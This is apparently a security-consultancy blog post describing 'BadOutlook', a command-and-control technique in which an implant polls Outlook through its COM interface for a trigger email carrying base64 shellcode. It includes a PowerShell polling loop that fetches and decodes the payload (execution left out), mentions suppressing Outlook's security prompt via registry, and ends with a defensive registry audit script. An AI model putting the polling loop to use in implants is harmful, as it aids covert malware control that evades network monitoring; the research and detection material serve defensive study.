BadOutlook for C2

BadOutlook is a command and control (C2) technique that leverages Microsoft Outlook’s COM interface for communication.
There are a handful of ways to detect malware, including antivirus (AV), endpoint detection and response (EDR) and network analysis. As a result, researchers spend a lot of time looking for ways to evade AV and EDR detection, from unhooking to the use of more exotic API calls, alongside research into defeating network detection and finding evasive communication channels. With respect to network evasion, most public research explores the use of legitimate websites, custom protocols and so on. What is the constant in all of these cases? The implant (i.e. your malicious code) either opens a port on the target system or makes outbound connections to the command and control server. One technique that is rarely explored is C2 without any direct network communication by the implant at all. The challenge then becomes how to send commands to the implant without ever communicating with it directly.
Concept

According to Microsoft, the Component Object Model (COM) is "a platform-independent, distributed, object-oriented system for creating binary software components that can interact." COM is the foundation technology for Microsoft's Object Linking & Embedding (OLE) and ActiveX (Internet-enabled components) technologies. In other words, COM is simply a way for two programs to talk to each other. Have you ever embedded an Excel spreadsheet inside a Word document? That is exactly the kind of scenario COM was designed for. Numerous Microsoft products expose COM interfaces that allow other applications to interact with them, including Word, Excel and the subject of this blog, Outlook.
Outlook exposes a COM interface whose top-level Application object, according to the documentation, "Represents the entire Outlook application." Through it a program can do anything from reading mailboxes and calendars to sending emails. Put simply, anything an end user can do in the main graphical user interface (GUI) can also be done through the COM interface. This post explores how I built an implant that monitors the Outlook client for C2 instructions: the implant itself makes no external (e.g. Internet) connections, because its instructions arrive through the mail flow Outlook already maintains.
Proof of Concept

BadOutlook uses the COM interface to poll a specified Outlook folder at a fixed interval. In this example, it polls the Inbox every 10 seconds looking for an email with the subject line "testtesttest2". Once BadOutlook finds a message with the trigger subject, it reads the email body, which contains base64-encoded shellcode, decodes it and executes it. This proof of concept is not in itself intended to be fully evasive; rather, it demonstrates a new method that can be incorporated into your own malware development.
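To make the polling loop concrete, here is an added PowerShell example written for this edit; it is not BadOutlook's own code. It attaches to the running Outlook client through the Outlook.Application COM object, polls the Inbox for the "testtesttest2" trigger subject on the same 10-second interval, decodes the base64 body and returns the bytes to the caller, then consumes the trigger message so the next poll does not fire on it again. The real PoC goes one step further and executes the decoded shellcode; that step is intentionally left out here. The folder constant (olFolderInbox = 6), the Items.Restrict filter syntax and the MailItem members are standard Outlook object model features; the function names and the per-message handling are my own assumptions, not the PoC's.

```powershell
# Added example: Outlook COM polling loop modelled on the BadOutlook concept.
# Requires a signed-in Outlook client in the same desktop session. Function
# names (Get-TriggerPayload, Wait-OutlookTrigger) are this example's own.

function Get-TriggerPayload {
    param(
        [Parameter(Mandatory)] $Folder,             # Outlook MAPIFolder COM object
        [string] $TriggerSubject = 'testtesttest2'
    )
    # Restrict() returns only matching items instead of walking the whole folder.
    # The filter value is single-quoted, so escape embedded single quotes.
    $filter = "[Subject] = '" + $TriggerSubject.Replace("'", "''") + "'"
    $hits = $Folder.Items.Restrict($filter)
    if ($hits.Count -eq 0) { return $null }
    $hits.Sort('[ReceivedTime]', $true)             # newest first
    $mail = $hits.GetFirst()

    # Capture metadata before the item is deleted below.
    $received = $mail.ReceivedTime
    $sender   = $mail.SenderName

    # Reading .Body is one of the accesses that can raise Outlook's
    # "a program is trying to access..." prompt when the object model guard is on.
    # Strip the line breaks Outlook inserts when wrapping a long base64 string.
    $encoded = ($mail.Body -replace '\s', '')
    try {
        $payload = [Convert]::FromBase64String($encoded)
    } catch {
        Write-Warning "Trigger mail found but body is not valid base64: $($_.Exception.Message)"
        return $null
    }

    # Consume the trigger so a later poll does not pick up the same message.
    $mail.UnRead = $false
    $mail.Delete()                                  # moves it to Deleted Items

    return [pscustomobject]@{
        Received = $received
        Sender   = $sender
        Payload  = $payload                         # byte[]; the PoC would execute this
    }
}

function Wait-OutlookTrigger {
    param(
        [int]    $IntervalSeconds = 10,
        [string] $TriggerSubject  = 'testtesttest2',
        [int]    $MaxPolls        = 0               # 0 = poll until a trigger arrives
    )
    # Outlook is single-instance: this attaches to the running client, or starts one.
    $outlook = New-Object -ComObject Outlook.Application
    $session = $outlook.GetNamespace('MAPI')
    $inbox   = $session.GetDefaultFolder(6)         # olFolderInbox = 6

    $polls = 0
    while ($MaxPolls -eq 0 -or $polls -lt $MaxPolls) {
        $polls++
        $hit = Get-TriggerPayload -Folder $inbox -TriggerSubject $TriggerSubject
        if ($hit) {
            Write-Host ("Trigger from {0} at {1}: {2} payload bytes" -f `
                $hit.Sender, $hit.Received, $hit.Payload.Length)
            return $hit
        }
        Start-Sleep -Seconds $IntervalSeconds
    }
    return $null
}

# Usage: $result = Wait-OutlookTrigger -IntervalSeconds 10
```

Two details worth noting. First, nothing in this loop opens a socket: the only process talking to the mail server is Outlook itself, which is the whole point of the technique. Second, the decoded payload is returned rather than executed, and the trigger message is deleted; without that last step a 10-second poll would re-read the same message on every pass.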
Additionally, Matthew Eidelberg's research can be used to execute this technique more evasively. Below are screenshots of the tool in action:
Figure 1: Polling the Outlook Client for the Trigger Subject Line
Figure 2: Email Containing the Trigger Subject Line and Base64-Encoded Shellcode
Figure 3: Trigger Email in Inbox Awaiting Execution
Figure 4: Trigger Email and Shellcode Executed, Resulting in an Interactive Command Prompt
Given the functionality available in Office products, it's possible for adversaries to leverage Outlook's COM interface for extended persistence. Because the implant does not require traditional outbound communication for its instructions (e.g. HTTP POST requests to a C2 server), blue teams that rely on network-based detections may struggle to see it. Outlook does, however, produce a security prompt when an outside program attempts to access Outlook through the COM interface, and that prompt can be suppressed through a registry setting. Organizations should consider configuring rules or checks to identify instances where that registry key has been set to disable the prompt. The instructions themselves still arrive as ordinary mail, so the trigger message (an otherwise empty email whose body is a large base64 blob) is a second place to look.
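As an added check (mine, not the post's), the PowerShell below walks the Outlook Security registry keys for the common Office versions and flags the ObjectModelGuard value that suppresses the prompt. The key paths and value meanings are taken from the Outlook Group Policy "object model guard" setting as I know it (0 = warn only when antivirus is inactive or out of date, 1 = always warn, 2 = never warn); treat them as an assumption to confirm against the policy templates for your Office version before deploying this as a detection.

```powershell
# Added example: audit the Outlook Object Model Guard setting that controls the
# "a program is trying to access..." prompt. Assumed semantics of the DWORD
# ObjectModelGuard (verify against your Office version's policy templates):
#   0 = warn only when antivirus is inactive/out of date (default)
#   1 = always warn
#   2 = never warn   <-- the state an implant using the COM interface wants

function Get-OutlookOMGuardState {
    param([string[]] $OfficeVersions = @('14.0', '15.0', '16.0'))

    $roots = @(
        'HKCU:\Software\Policies\Microsoft\Office',   # user-scope policy path
        'HKLM:\Software\Policies\Microsoft\Office',   # machine-scope policy path
        'HKCU:\Software\Microsoft\Office'             # per-user path an implant could set
    )
    foreach ($root in $roots) {
        foreach ($ver in $OfficeVersions) {
            $key = Join-Path $root "$ver\Outlook\Security"
            if (-not (Test-Path $key)) { continue }

            $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
            $guard = $props.PSObject.Properties['ObjectModelGuard']
            if ($null -eq $guard) { continue }          # value not present at this path

            [pscustomobject]@{
                Key        = $key
                Value      = [int]$guard.Value
                Suspicious = ([int]$guard.Value -eq 2)  # prompt disabled outright
            }
        }
    }
}

# Report every path where the prompt has been turned off; silence means the
# default behaviour is still in force at that path.
Get-OutlookOMGuardState | Where-Object Suspicious | ForEach-Object {
    Write-Warning "Outlook COM prompt disabled at $($_.Key) (ObjectModelGuard=$($_.Value))"
}
```

Run this under the user's context (the HKCU paths are per-user) and collect the output centrally; a value of 2 appearing under the non-policy HKCU path on a host where Group Policy does not set it is the case worth investigating, since an unprivileged implant can write there.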
Ali S. Ahmad | Consultant II
Ali Ahmad is a Security Consultant in Optiv's Threat Management Team (Attack and Penetration specialization). His primary roles include executing perimeter and internal network penetration tests and researching and developing Windows malware samples.